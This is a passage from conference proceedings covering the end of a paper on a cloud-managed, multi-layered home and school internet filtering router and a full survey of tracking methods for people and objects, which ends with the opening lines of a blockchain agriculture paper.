makes this filtering dependent on the installation and use of one of these browsers as well as the activation of this option. • Layer 7-based filtering: This type of filtering is very advanced since it allows, without the use of other network parameters, to identify, following the analysis of the data transmitted, the source application or service, which facilitates flow control in a network. However, its integration, into lightweight filtering systems, is quite difficult to implement.

3 Problematic In a home network or on restricted networks, it is rare to find a firewall dedicated to filtering management, which means that those looking to manage web-filtering face several difficulties including the need for a fairly in-depth knowledge of network protocols to effectively apply the types of filtering mentioned above. The adoption of client-side Internet filtering still does not meet the needs of users because of the disadvantages and limitations mentioned above.

4 Project Presentation The filtering system is composed of three essential elements namely filtering equipment, cloud servers and a control application. 4.1 Filtering Equipment The filtering equipment, in most cases in these types of network, is a Wi-Fi router whose “firmware” is modified to incorporate new features. However, said equipment can also be any filtering devices that support secure remote access, (ssh or other) and that acts as a firewall. Communication with the filtering equipment is done under a “Client/Cloud/Host” architecture (see Fig. 1), similar to that of an IoT. This architecture has allowed us to have the following advantages: • All the features of the filtering equipment are accessible to the user via a single protocol in this case https; • Enhanced security of the target filtering equipment since it is configured to accept requests from one or more well-identified cloud servers; • It takes advantage of this architecture so that its hardware configuration can remain quite small (see Table 2). There had been a constraint on the choice of a router. This happened due to several factors including market availability, interface throughput and price. The latter must remain within the reach of the majority of users. By adopting this architecture, our equipment has the advantage of a very low cost, enhanced security and speed of processing.

A Lightweight, Multi-layered Internet Filtering System

33

Table 2. Comparison between a communication between the host and the client in both architectures. Client/Server Architecture

Client/Cloud/Host Architecture

Minimum requirements on the host

It requires a considerable amount of RAM and flash memory

It does not require a large amount of RAM or flash memory

The services installed on the host

Installing several services including the Web and VPN service, in addition to the authentication service, on the host’s system

No services are required to be installed on the Host system

Updates to the app or any of the features

Often requests updates for all Is only done on cloud servers installed services on each host

Safety features

An attack protection system is Protection against attacks is required on the host an integral part of the cloud

Host response time

Requests go through processing on the host before being sent to the cloud for a second processing

The processing goes directly to the cloud servers to be executed on the host

Fig. 1. Presentation of the architecture and filtering process of the equipment realized.

34

A. Sadiqui and F. M. Rachid

4.2 Servers on the Cloud The solution is composed of several servers installed on the Cloud. These provide, among other things, user authentication, access policy management and remote control of routers. The essential servers are: • VPN connection servers that ensure a secure tunnel between equipment and cloud servers to exchange data. • DDNS synchronization servers that update the public IP address of the filtering equipment to identify it on the Internet. • Database servers have filtering methods that identify the method to choose to block content on the Internet. This database is an essential part of the project. It makes content filtering independent of the equipment’s operating system. It brings together several scripts developed to be executed on several platforms. • The database servers of the user options that allow to know the choices of each user. 4.3 The Mobile Control Application Data filtering is done with a mobile application downloadable from the Internet. Each supervisor (a parent, a director, a network administrator, etc.) will be asked to enter a login and password to access his private space. The latter gives him the possibility to manage his users and apply the filtering of his choice. Note that the application is designed to be accessible to anyone with simply basic knowledge of computer interface use (see Fig. 2). Indeed, as a simplification, the supervisor will often choose between only two options “block” or “allow” a service, an application, a game, etc. Therefore, it is up to the filtering system to choose the appropriate type of filtering to apply to ensure its choice. With this in mind, we propose another approach that makes it possible to deploy a lightweight Internet filtering system available to the users and that considers the constraints we have mentioned. Indeed, this system can automatically determine the technique and parameters used to block access to a domain, a service, an application, or other elements on the Internet.

5 The Filtering Process On home networks, to be educational or restricted, we have divided the need for filtering into three types of essential elements in this case: web pages, services or applications. Each element has a well-defined filtering module.

A Lightweight, Multi-layered Internet Filtering System

35

Fig. 2. Two examples of mobile app interfaces.

5.1 The Web Filtering Module The web page filtering process is divided into two parts depending on the type of web page to be processed (see Fig. 4 and Fig. 5). If it is a “simple” web page, filtering is done based of whether or not it belongs to the domains corresponding to pre-established rules, either by parental control or by the security policy of the establishment. However, if it is a web page that displays the result of a search engine, and if, in addition, the “safe search” option is activated, the filtering will be based on the server dedicated to this type of process. The display of unfiltered results will be carried out otherwise. Search engine-based filtering includes text, images and videos. The equipment relies on the filtering database to identify the settings to be enabled to the user on the DNS servers on the cloud to display the requested result. This type of filtering uses the DNS filtering method. However, it was optimized to strengthen its security to remedy any possible bypass. 5.2 The Service Filtering Module A service, in a home or restricted network environment, means any functionality that meets particular needs or is likely to perform well-specified tasks, and above all that can be identified by one or more fixed ports such as: • The download service using the ftp protocol or other: this service is, in some cases, seen as a risk against the availability of bandwidth.

36

A. Sadiqui and F. M. Rachid

• The service that provides access to an IoT object in the local network: this service can present security risks. Remote access port activation must be controlled. • VPN server access service: Establishing a VPN link by an unauthorized user can lead to the circumvention of some access rules. • The service filtering module relies on the filtering database to identify the user’s port settings to open or close the user (see Fig. 4 and Fig. 5). 5.3 The Filtering Module of an Application The filtering process of an application can have some peculiarities given the difficulty of identifying a common process to follow to ensure this task. Each application has its specificities and may require separate processing. The methods of blocking an application may also vary and evolve over time and must always be updated to ensure system reliability. The equipment in question uses the filtering database to identify the appropriate method to block an application by running a pre-established script for this purpose (see Fig. 4 and Fig. 5).

6 The Deployment of the Solution Deploying the solution is very simple. Indeed, it is enough to connect the Internet filtering equipment with the modem providing connectivity to the Internet regardless of the type of Internet connection used, ADSL, Fiber optic, 4G or others, to afford protection. Indeed, in the case of a simple Wi-Fi network (family network, cafe, etc.) where the user’s modem offers a Wi-Fi network, simply disable the latter to enjoy a protected Wi-Fi network. In the case of a wired architecture (school, university, association etc.) where the elements are connected by network cables, our solution can be integrated by connecting the Internet filtering equipment to the institution’s switch (see Fig. 3).

Fig. 3. Deploying the solution on a LAN.

A Lightweight, Multi-layered Internet Filtering System

Fig. 4. General filtering process

37

Fig. 5. The general filtering algorithm.

38 A. Sadiqui and F. M. Rachid

A Lightweight, Multi-layered Internet Filtering System

39

7 Conclusion The equipment presented in this study is easy to use, convenient and intuitive. It has managed to significantly reduce the cost, time, and effort of carrying out Internet filteringa task that has always been a matter of specialists. The equipment, therefore, offers parents protection for their children in terms of navigation, teachers the possibility of sharing the Internet without hesitation, and entrepreneurs the means to limit access to sites or services deemed irrelevant to their work. Finally, it is noteworthy that the project has been deployed and tested by many people, several institutions, and SMEs and has demonstrated its effectiveness and the satisfaction of its users. Nevertheless, we believe that there is still an effort to be made on the one hand, concerning the side relating to the awareness of families on the dangers of the Internet, and on the other hand, on the administrative side to urge education officials to protect educational spaces connected to the Internet.

Tracking Methods: Comprehensive Vision and Multiple Approaches Anass Ariss1(B) , Imane Ennejjai1 , Nassim Kharmoum1,2 , Wajih Rhalem3 , Soumia Ziti1 , and Mostafa Ezziyyani4 1

Department of Computer Science, Intelligent Processing Systems and Security Team, Faculty of Sciences, Mohammed V University in Rabat, Rabat, Morocco [email protected] 2 National Center for Scientific and Technical Research (CNRST), Rabat, Morocco 3 E2SN Research Team, ENSAM Rabat, Mohammed V University in Rabat, Rabat, Morocco 4 Mathematics and Applications Laboratory, Faculty of Sciences and Techniques of Tangier, Abdelmalek Essaadi University, T´etouan, Morocco

Abstract. Tracking of human beings, as well as objects, becomes a great challenge currently presented, it aims to understand the fundamental principles of objects and human beings detected to associate them with robust systems for treaties and draw the desired conclusions. Tracking generally uses several methods such as graph theory, technological tools, Internet of Things (IoT), Big Data, and artificial intelligence, where it maintains several hypotheses to help tracking objects or human beings. In this article, we propose the tracking methods proposed in this direction, and finally, we analyze and discuss the various results obtained. Keywords: Tracking · Graph Theory Data · Artificial Intelligence

1

· Internet of Things (IoT) · Big

Introduction

Tracking systems become a necessity for the analysis of dynamic processes of human beings, as well as objects from their data. As the detection and tracking of a large number of people is not feasible, several tracking methods have been suggested for these objectives by many groups of researchers, to carry out an analytical study on existing methods. We evaluated the results of each work in this work. Although no method works best in all scenarios. Many data in the world have been lost due to the non-existence of monitoring and control of this data generated by human or object activity, which requires tracking. A multiple tracking of humans or objects is a treatment for irregular movements such as changes in appearance and detection of abnormal behaviors of humans or objects until enough information is accumulated, to make a decision [18]. A tracking system can be used to learn everything from the activity and make the most of the data [21]. This system can then be used to fight crime, as well as to c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 40–54, 2023. https://doi.org/10.1007/978-3-031-35251-5_5

Tracking Methods: Comprehensive Vision and Multiple Approaches

41

deal with epidemics and other characteristics. The tracking of objects as well as humans in spaces with limited or unlimited dimensions requires robust methods that ensure accurate tracking, also able to understand and analyze the activities of objects or humans to facilitate decision-making. A strong tracking of several objects or people through its data requires extraction and processing models specific enough to remove the ambiguity of the data. However, we want models to be general and simple enough to allow robust tracking. Numerous researches had been conducted in the field of multiple tracking of human beings as well as objects. Among these works, we can mention those who worked on this theme using as techniques the theory of graphs [12,13], technological tools, Internet of Things (IoT) [14], Big Data [16], and artificial intelligence [15] or using more than one technique to achieve better results. Our work falls into all these categories of approaches. In this work, we presented an analytical study on tracking systems exists. It can be seen as complementary to charting another research path on this topic, as it provides a global view of the methods used in this concept. Part of our work is to study the extraction of terms for word cloud generation from strongly labeled domains in articles that deal with the topic of tracking. We present a term extraction technique based on Word Cloud which is a data visualization method used for the presentation of textual data in which the size of each word indicates its frequency or importance, as well as significant textual data points, can be highlighted using a word cloud. This technique reinforces the frequently used terms to abstracts of published articles whose tracking problem has been dealt with, as shown by the Fig. 1 result, the most common words on the existing works are: (tracking, system, person, people, object, technology, graph, Big Data, IoT, artificial intelligence, etc.). Our experiences of extracting terms based on extracting abstracts from different articles show that each increase in the number of abstracts, a considerable improvement in the quality of the word cloud. In addition, our results demonstrate the robustness of this approach, compared to alternative cloud generation methods that have a high sensitivity to data scarcity. The rest of this article is organized as follows. The second section elucidates the tracking. In the third section, some related work is briefly reviewed. Considering that analysis and discussion are described in the fourth section. Finally, the fifth section presents the conclusion of our study and specifies our ongoing work.

2

Elucidation Tracking

The characterization of the tracking theme is broad, thanks to the availability of numerous definitions so that each group of researchers in their fields gives this theme a definition that corresponds to their specializations and their fields of activity. We mention some commonly used definitions that say that a tracking system, also known as a tracking system, is used for the detection of moving persons or objects and provides location data for subsequent processing. We also

42

A. Ariss et al.

Fig. 1. The extraction of terms for word cloud in tracking articles.

note that a tracking system is a system used to monitor the data of people and moving objects. He sees himself as an important tool for getting information about people or another type of interest. Our team believes that a tracking system is a strategy to target objects or people. This operation is made possible to track the target from an analysis of their activities. After highlighting this work, we note that so far, no author has designed a flexible tracking system. After having highlighted different works done in this context, we note that the tracking system can be done according to three dimensions Fig. 2, the dimensions can have 1 to N form of implementations at the moment T, these denials are bound together by two-way, non-exclusive relationships. The system also gives flexibility at the starting point level, which means that tracking can start with any dimension, which gives the system a backward-compatibility force depending on the input. At the end of the data qualification, different implementations are made available, the role of these implementations is to build a complete system whose implementations can cohabit between them.

3

Related Work

Research on tracking [1] is considered more important and at the same time more complex, on the one hand, each proposed solution deals with the problem in a specific way, on the other hand, a tracking system is not supported by any standard.

Tracking Methods: Comprehensive Vision and Multiple Approaches

43

Fig. 2. Tracking systems architecture.

This justifies an increase in research on this topic. To do this, we analyze some research, as well as searches of the international database Scopus [38] which belongs to Elsevier and we obtained as result Fig. 3: – For the themes (Tracking, Tracking systems, Multiple tracking, Multi tracking, Tracking methods, tracking method) research on this topic has begun since 1978, the number of articles submitted is negligible before the 2000s, and since 2002 a growing activity on research in this field. The work done so far does not use the same functionalities and does not intervene with solutions that can be considered as general and projectible approaches on several domains and situation. That is, when work focuses on the treatment of the Tracking problem in one sense, other work involves non-extendable solutions. Our study is based on the different approaches of Tracking and gives more clarifications on the latest efforts made in this context. Hefeng et al. [4] presented a new approach to multi-person online tracking based on in-depth learning [20] that focuses on learning to represent instances sensitive with the multi-branch neural network (MBN) [17], while the basic subnet provides a deep image function, Instance sub-networks generate apparent discrimination at the instance level to reduce ambiguities between the different objectives and free the burden of a subsequent data association. Its objective is to use learning and the association of sensitive representation to the bodies for the online follow-up of several people. The article solves detection problems,

44

A. Ariss et al.

Fig. 3. Analysis of scopus search results: Tracking systems documents by year .

the work proposes a traditional paradigm shift from detection to the association by learning representations of instance-sensitive people. Unlike existing methods that generally use generic human detectors (at the category level). A proposed approach that aims to assign to each person in motion a specific tracker to reduce ambiguities in complex scenes, with representations of objects at the level of the instance learned by deep neural networks, this brings the authors back to an interesting result, which is indeed a construction of an association matrix based on the outputs of the MBN network for a joint state inference of the targets, where a simple but effective solver has developed thanks to the powerful support of MBN. Janusz Wojtusiak and Reyhaneh Mogharab Nia. [5] propose a model capable of predicting the location of the person, both during the routine calendar and in case of loss, to address the problem of follow-up of people in general, and especially people with Alzheimer’s disease are at risk of wandering and getting lost outside their homes. This is achieved through a multi-step process that involves unsupervised and supervised learning [19,39]. This approach has many similarities to previous research, but differs in many ways, including the definition of a method presented is based on spatial clustering-time used to detect normal locations where individuals are typically located, thus they showed detected clusters are passed to a supervised learning algorithm to construct models to predict typical locations based on date and time as well as some characteristics derived from geolocation data, All these interactions led to a result which is the achievement of a method with better AUC of 78% to predict the locations according to the day, the time and the extracted location and duration attributes.

Tracking Methods: Comprehensive Vision and Multiple Approaches

45

Djamal Merad et al. [6] proposes for solution for the problem of tracking multiple objects is the change of identity that occurs between the tracked targets due to occlusions and interaction between tracked objects, through an understanding of the purchasing behavior of customers by analyzing their movements in a densely populated commercial space. The approach proposed in this work is focused on solving the problem of identity changes caused by severe longterm occlusions by using the proposed method for the re-identification of people through cameras without overlapping. The tracking strategy is done in two steps: The first is to use a particle filter to retrieve the trajectory segments (tracklets) for the tracked individuals. As well as the second step is to use the re-identification method to merge these tracklets and retrieve the tracker people’s global trajectories. This document is presented in the form of a tracking system based on the association of two modules, tracking and association modules, to retrieve the overall trajectories of the individuals followed in a single-camera tracking system. The tracking module that is used to retrieve trajectory segments is based on the use of a dedicated particulate filter for each individual being tracked, while the association module, which is the most important part of this work, is used to obtain matches between the individuals tracked from the tracking module. These matches are used to merge trajectory segments that belong to the same individual to find the overall trajectories of the people being tracked. We can summarize the result of this work in two modules, the first module which is the tracking module is based on the use of dedicated particle filters that are used to retrieve the tracklets (trajectory segments) for each tracked individual. The second module, which is the association module, is used to merge these tracklets and retrieve the global trajectories of the tracked individuals. Mouna Amrou M’hand et al. [7] have given the architecture of tracking to the purpose of the goods, to ensure the control and the management of the various logistic operations. The main objective of this work is to contribute to the literature on RoRo terminals (Roll-On/Roll-Off). This is to find solutions for the automation of supervision, control, and tracking of rolling goods. For this, they contributed a new architecture designed based on automatic identification technologies (barcode, QRCode, and magnetic identity cards). It provides real-time tracking capability. It follows a vehicle in each area of the terminal via a portal that identifies it using a barcode, QRcode, or magnetic identity card. The system performs process logic verification and reasoning and provides process knowledge support. The result of this approach is to track vehicles in real-time as well as to offer decision support to logisticians. Badreddine Benreguia et al. [8] proposed an important solution to track down and help address the global coronavirus pandemic [2], in the form of an architecture to track asymptomatic patients who are considered to be the main factor behind the rapid spread of coronaviruses and are also the main reason why governments have lost control of the world critical situation.

46

A. Ariss et al.

The goal of the system is not to track people but to track extremely dangerous viruses, making it the archiving of the trajectory of people collected continuously using a Big Data architecture, This proposed model is powered by IoT devices that can determine people’s contact information during their outdoor activities and send the collected data to the system. On the other hand, people who stay at home or in their vehicles are supposed to be isolated. All this gives reliability to this system that makes it possible to quickly identify all people suspected of being infected with the coronavirus or controlling other pandemics. Javier Ruiz-del-Solar et al. [9] deals intending to make a robust tracking of people in real and real time environments, for this purpose they have developed a computer system that repents to this theme. The work is Counted on two main approaches, the first is feature-based, which are low-level analyses, analysis of active form entities and models, as well as the second image-based approach which are the methods of the sub-based linear space, neural networks, and statistical approaches. Image-based approaches have shown better performance than feature-based approaches. The result provided in this article is a system consisting of three main subsystems; The first is dedicated to movement analysis, this motion analysis subsystem is based on background subtraction and selectively excludes moving visual objects and their shadows from the background model, while retaining ghosts. The second focuses on color analysis, this color analysis subsystem uses a standard skin detector algorithm, which increases the performance of the entire system by reducing the search area for faces. The last one is Face Analysis, which is based mainly on the face detection system. Nicolas Thome et al. [10] proposes a solution to follow and interpret the movements of the human body with robustness by correctly labeling the parts of the latter in the video sequences. The proposed method was different from existing approaches that are based either on motion, on a model, based on appearance, or based on features, all of these approaches require that people are indeed supposed to be in a standing position. The article comes from a hybrid approach, that is to say, an approach dedicated to the localization and identification of the visible parts of the body in the image, independent from the point of view and the human pose. This proposal leading the authors to intervene an algorithm treats as follows, the identification of a set of segments in the image, corresponding to the parts of the body to be identified, then a graph encoding the shape of the silhouette is generated and compared to a 3D model of the human skeleton so that each paired graph node is tracked over time. Tracking COVID-19 cases in real-time and predicting participants are likely to have COVID-19 [3], is the goal of the article by Cristina Menni et al. [11] to do this they provided a predictive model combining symptoms to predict a probable infection were applied to data from all users of the app who reported symptoms and predicted participants are likely to have COVID-19. Two main contributions cited in the article, the first contribution is that odor and taste loss is a potential predictor of COVID-19 in addition to other more established symptoms, including high temperature and persistent new cough.

Tracking Methods: Comprehensive Vision and Multiple Approaches

47

The second contribution was the identification of a combination of symptoms, including anosmia, fatigue, persistent cough, and loss of appetite, which together could identify people with COVID-19.

4

Analysis and Discussion

In this section, we did an analysis and discussed the different approaches studied above. To do this, we focus on the classification of the following work (Hefeng et al. (2019); Janusz Wojtusiak and Reyhaneh Mogharab Nia. (2019); Djamal Merad et al. (2019); Mouna Amrou M’hand et al. (2019); Badreddine Benreguia et al. (2020); Javier Ruiz-del-Solar et al. (2003); Nicolas Thome et al. (2016); Cristina Menni et al. (2020)) to conclude our evaluation criteria. Thus, we organize our agreed criteria according to the issues dealt with and the proposed solutions, so as to discuss the issues dealt with, the proposed solutions and make an assessment on the methodologies followed in the work. After the analysis, we can break down the above work into two main categories. The first concerns approach on tracking for human beings, as well as the second category, concerns the tracking of objects Fig. 2, indeed these approaches can follow different characteristics, adopted in a space with limited surface or in a space with large dimension (unlimited), in real-time or unreal, using technological tools, IoT, graph theory, Big Data or artificial intelligence. Starting from the choice of the tracking model, we can deduct from Table 1 that we can build our tracking system by merging each strong point used in the works [4–11]. In analyzing the work, some approaches use artificial intelligence models [4,5,11], in [4], the authors dynamically launch a subnet for each instance of a person, to predict the next location and use the intersection on the union and the detection confidence in the calculation of association costs, this approach remains open to improvement, Indeed the basic subnet of our MBN network will be improved to strengthen the robustness and discrimination of its extracted features. The approach can better manage small objects by tailoring the feature extraction process to different object sizes, as well as a more efficient model should be designed for sub-instance network, and finally the study of more efficient terms for composing elements of the association matrix and will exploit new data association algorithms. In addition, the authors of the paper intend to expand their work to incorporate full category detection and form a unified framework. With the powerful ability to learn representations of deep CNN models, these methods generally address the problem of scale variation by using multicolumn architectures to improve functionality learning, where the input is processed with convolutive kernels of different sizes in each column to extract features on different scales. However, they suffer from certain problems. First, the large-scale variation cannot be covered by the limited number of columns and the blinding increase in the number of columns will result in a massive overload of parameters, which easily fails at diverse scales. Second, these networks usually generate a low-resolution crowd density map while learning increasingly abstract features. Therefore, they still have the problem of serious degradation

Table 1. Comparison of studied Approach

48 A. Ariss et al.

Table 2. Detailed comparison of the approach studied through a classification of Approaches

Tracking Methods: Comprehensive Vision and Multiple Approaches 49

50

A. Ariss et al.

of precision when applied in difficult crowd scenes with a large-scale variation or high congestion. The authors [5] present a study of the viability of machine learning techniques applied in GPS data, to predict possible pathways for people with dementia (Alzheimer’s disease - AD). They used a combination of unsupervised and supervised models to learn the routines of individuals [9]. In their approach, they use an unsupervised model to determine where an individual spends the majority of their time. They then use a supervised model to predict the location of individuals based on the day of the week and the time of day. The authors were able to reach an average ROC (AUC) area of 0.778 with an accuracy of 0.631 and a precision of 0.662. Their approach considered only temporal-spatial data and did not address the detection of abnormal behavior. The authors suggest that predictive models for each individual can be produced, depending on how often the individual wears the laptop, so GPS data is collected. The main drawback of this work is that the GPS, quickly drains the battery of the IoT device, so the data is not limited to patients with AD, and in fact, there is no information about the carriers of the device. Yet [8] using an IoT system to handle Covid-19 has also begun to be widely conducted, in the areas of health, tracking, prevention, and several other applications. The system shows good results on indicators applied to reality, indeed, follow the trajectories of infected people, and this, a few days before the appearance of their symptoms, identification of people who were in close contact with infected patients and identification of black areas, which may be the main source of viral spread. The proposed system can be configured to find all uninfected people who have visited places that have already been visited by other infected people as determined if citizens respect social distancing and also to check if people suspected of being infected comply with the imposed internment, also help reduce the economic damage caused by the suspension of all activities. The proposed solution can be used for any potential outbreak that could be more powerful and have a higher rate of spread. Finally, the system can be equipped with additional features such as machine learning or deep learning capabilities. A small point to improve in this approach is the impossibility of determining the trajectory of infected persons who have not met during its trajectory, as well as if the person does not respect the instructions and precautionary measures. Among the approaches analyzed, some address this problem using technological tools as the main actors [6,7]. [6] Conducted an analysis of purchasing behavior based on the intensity of computer vision technology and customers in the store. Different algorithms have been used to track people in the video recordings, in this context they have classified the appearances of pedestrians in front and back postures in addition to segmenting the detected individuals into several parts such as the head and torso. However, part-based tracking algorithms can hardly overcome the challenges when the target is fully occlusive or long gone. We can improve this work by adding new behavioral analysis solutions based on artificial vision are emerging. Among these solutions, citing the example of eye-tracking and recognition of gestures. As well as focusing on

Tracking Methods: Comprehensive Vision and Multiple Approaches

51

the use of this association module in the tracking system that prevents identity changes caused by severe occlusions and interaction between followed customers in crowded stores. [7] proposed a real-time tracking and surveillance architecture for logistics and transport in RORO (Roll-On / Roll-Off) terminals. The system aims to manage dynamic logistics processes and optimize certain cost functions such as traffic flow and time of recording. The specific mission of the system is the identification, monitoring, and tracking of rolling freight. Among the strengths of this solution proposed in [7], is the capture of data in a few seconds, the reduction of recording time and the increase of traffic flow, the use of the necessary technological tools to track a variety of data such as barcodes or QRCode, also the adoption of identity scanning cards, they are inexpensive and do not require the presence of a person to perform the scanning operation. This work requires the projected in reality, via an evaluation using a real case study with data from a port for example. Among other means, finds the use of graphs, there are dedicated models to track people who are inspired by the theory of graphs. In [10], the points of a human skeleton are calculated using a silhouette model. Instead of calculating the 3D position of the skeleton points, a topology of the structure of the human body is used for limb labeling. The proposed method may address different views of a person, such as front, back, and profile. It also provides appropriate labeling of limbs for unspecified human postures. However, they only use the topology of the corresponding graph to label different parts of the body, which makes it difficult to manage the situation where the arms are merged with the torso. By analyzing the proposals of each article, we observe that no approach can be adapted on human beings as well as on objects, for example in [4,5,8– 11] is considered as the sub-level of tracking for beings-humans, but in [6,7] is considered the sub-level of tracking for objects. For our team, we are for the researchers who say that we must find an approach that combines all the technology used in the articles [4–11] to have a high-performance and general approach, also an adaptable solution with all the granularities of Fig. 1. Table 1 shows a detail on the approaches proposed in the articles, the problem addressed and the proposed solution, assessing the type of methodologies followed in each approach [4–11]. In contrast, Table 2 provides a classification of approaches [4–11] according to Fig. 2. Approaches are based on a case study, but they can also use a practical case as shown [4–6,8–10]. An approach [7] is based only on a case study, but [11] is based just on a practical case. Therefore, this study will facilitate the choice of the model to use in tracking, moreover, even all the approaches mentioned in this article and as this theme of tracking is strongly imposed in recent times, many methods are not generating so far at the tracking level. Moreover, all the tracking approaches proposed so far are limited and not generalized. However, we may have other approaches that are not mentioned in this study.

52

A. Ariss et al.

Finally, to close our analysis and discussion of the different approaches studied, we show the main granularities of a tracking approach based on the articles studied: – – – –

5

Tracking for people or objects. Tracking in limited or unlimited space. Tracking in real or unreal time. Tracking using technology tools, IoT, graphs, Big Data, and artificial intelligence.

Conclusion and Future Work

This article deals with the topic of tracking in its entirety, by analyzing and discussing different approaches and giving more light on the latest. So far, a few approaches have been proposed, and most of them are not complete. Our research team has a goal of having a tracking system that tracks the target on an ongoing basis. The purpose of this system is to track the target on an ongoing basis. This is due to the sensitivity and accuracy of the subject in certain areas such as terrorism, epidemics, and criminology as kidnapping. In our future work, we will complement the approach under consideration, proposing new comprehensive approaches, covering all potential cases, and focusing on the different parts that are not yet generated.

References 1. Leal-Taix´e, L., Milan, A., Schindler, K., Cremers, D., Reid, I., Roth, S.: Tracking the trackers: an analysis of the state of the art in multiple object tracking. arXiv preprint arXiv:1704.02781 (2017) 2. He, F., Deng, Y., Li, W.: Coronavirus disease 2019: what we know? J. Med. Virol. 92(7), 719–725 (2020) 3. Headey, D.D., Ruel, M.T., et al.: The COVID-19 nutrition crisis: What to expect and how to protect, IFPRI book chapters, pp. 38–41. International Food Policy Research Institute (IFPRI) (2020) 4. Wu, H., Hu, Y., Wang, K., Li, H., Nie, L., Cheng, H.: Instance-aware representation learning and association for online multi-person tracking. Pattern Recogn. 94, 25– 34 (2019) 5. Wojtusiak, J., Nia, R.M.: Location prediction using GPS trackers: can machine learning help locate the missing people with dementia?. Internet Things, 100035 (2019) 6. Merad, D., Aziz, K.-E., Iguernaissi, R., Fertil, B., Drap, P.: Tracking multiple persons under partial and global occlusions: application to customers’ behavior analysis. Pattern Recogn. Lett. 81, 11–20 (2016) 7. M’hand, M.A., Boulmakoul, A., Badir, H., Lbath, A.: A scalable real-time tracking and monitoring architecture for logistics and transport in RoRo terminals. Procedia Comput. Sci. 151, 218–225 (2019)

Tracking Methods: Comprehensive Vision and Multiple Approaches

53

8. Benreguia, B., Moumen, H., Merzoug, M.A.: Tracking COVID-19 by tracking infectious trajectories. IEEE Access 8, 145242–145255 (2020) 9. Ruiz-del-Solar, J., Shats, A., Verschae, R.: Real-time tracking of multiple persons. In: 12th International Conference on Image Analysis and Processing, 2003, Proceedings, pp. 109–114. IEEE (2003) 10. Thome, N., Merad, D., Miguet, S.: Human body part labeling and tracking using graph matching theory. In: 2006 IEEE International Conference on Video and Signal Based Surveillance, pp. 38–38. IEEE (2006) 11. Menni, C., et al.: Real-time tracking of self-reported symptoms to predict potential COVID-19. Nat. Med. 26(7), 1037–1040 (2020) 12. Bollob´ as, B.: Modern Graph Theory, p. 184. Springer, Heidelberg (2013). https:// doi.org/10.1007/978-1-4612-0619-4 13. Bondy, J.A., Murty, U.S.R.: Th´eorie des graphes. Springer, Heideleberg (2008) 14. Buyya, R., Dastjerdi, A.V.: Internet of Things: Principles and Paradigms. Elsevier, Amsterdam (2016) 15. Norvig, P.R., Intelligence, S.A.: A Modern Approach. Prentice Hall, Upper Saddle River (2002) 16. Furht, B., Villanustre, F.: Big Data Technologies and Applications. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44550-2 17. Al Rahhal, M.M., Bazi, Y., Abdullah, T., Mekhalfi, M.L., AlHichri, H., Zuair, M.: Learning a multi-branch neural network from multiple sources for knowledge adaptation in remote sensing imagery. Remote Sens. 10(12), 1890 (2018) 18. Han, M., Sethi, A., Hua, W., Gong, Y.: A detection-based multiple object tracking method. In: 2004 International Conference on Image Processing, 2004, ICIP 2004, vol. 5, pp. 3065–3068. IEEE (2004) 19. Berry, M.W., Mohamed, A., Yap, B.W. (eds.): Supervised and Unsupervised Learning for Data Science. USL, Springer, Cham (2020). https://doi.org/10.1007/9783-030-22475-2 20. Goodfellow, I., Bengio, Y., Courville, A.: Deep Learning, vol. 1, 2nd edn. MIT press, Cambridge (2016) 21. McKenna, S.J., Jabri, S., Duric, Z., Rosenfeld, A., Wechsler, H.: Tracking groups of people. Comput. Vision Image Underst. 80(1), 42–56 (2000) 22. Lee, H.C., Luong, D.T., Cho, C.W., Lee, E.C., Park, K.R.: Gaze tracking system at a distance for controlling IPTV. IEEE Trans. Cons. Electron. 56(4), 2577–2583 (2010) 23. Celebi, M.E., Aydin, K. (eds.): Unsupervised Learning Algorithms. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-24211-8 24. Huo, F., Hendriks, E.A.: Multiple people tracking and pose estimation with occlusion estimation. Comput. Vision Image Underst. 116(5), 634–647 (2012) 25. Wengefeld, T., Lewandowski, B., Seichter, D., Pfennig, L., M¨ uller, S., Gross, H.M.: Real-time person orientation estimation and tracking using colored point clouds. Rob. Auton. Syst. 135, 103665 (2021) 26. K¨ u¸cu ¨kke¸ceci, C., Yazici, A.: Multilevel object tracking in wireless multimedia sensor networks for surveillance applications using graph-based big data. IEEE Access 7, 67818–67832 (2019) 27. Lukasczyk, J., Weber, G., Maciejewski, R., Garth, C., Leitte, H.: Nested tracking graphs. Comput. Graph. Forum 36(3), 12–22 (2017) 28. Xiao, C., et al.: A new deep learning method for displacement tracking from ultrasound RF signals of vascular walls. Comput. Med. Imaging Graphi. 87, 101819 (2021)

54

A. Ariss et al.

29. Widanagamaachchi, W., Christensen, C., Pascucci, V., Bremer, P.-T.: Interactive exploration of large-scale time-varying data using dynamic tracking graphs. In: IEEE Symposium on Large Data Analysis and Visualization (LDAV), pp. 9–17. IEEE (2012) 30. Meijering, E., Dzyubachyk, O., Smal, I.: Methods for cell and particle tracking. Methods Enzymol. 504, 183–200 (2012) 31. Karimov, K.S., Saqib, M.A., Akhter, P., Ahmed, M.M., Chattha, J.A., Yousafzai, S.A.: A simple photo-voltaic tracking system. Solar Energy Mater. Solar Cells 87(1–4), 49–59 (2005) 32. Yilmaz, A., Javed, O., Shah, M.: Object tracking: a survey. ACM Comput. Surv. (CSUR) 38(4), 13-ES (2006) 33. Walter, T., Couzin, I.D.: TRex, a fast multi-animal tracking system with markerless identification, and 2D estimation of posture and visual fields. Elife 10, e64000 (2021) 34. Tryggvason, G., et al.: A front-tracking method for the computations of multiphase flow. J. Comput. Phys. 169(2), 708–759 (2001) 35. Metcalf, C.E., Kemper, P., Kohn, L.T., Pickreign, J.D.: Site definition and sample design for the Community Tracking Study. Center for Studying Health System Change, Washington, DC (1996) 36. Peng, J., et al.: TPM: Multiple object tracking with tracklet-plane matching. Pattern Recogn. 107, 107480 (2020) 37. Chenouard, N., et al.: Objective comparison of particle tracking methods. Nat. Methods 11(3), 281–289 (2014) 38. Scopus preview - Scopus - Welcome to Scopus. https://www.scopus.com/. Accessed 27 June 2021 39. Liu, Q., et al.: Online multi-object tracking with unsupervised re-identification learning and occlusion estimation. Neurocomputing 483, 333–347 (2022)

Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management Adil El Mane1(B) , Redouan Korchiyne1 , Omar Bencharef2 , and Younes Chihab1 1

2

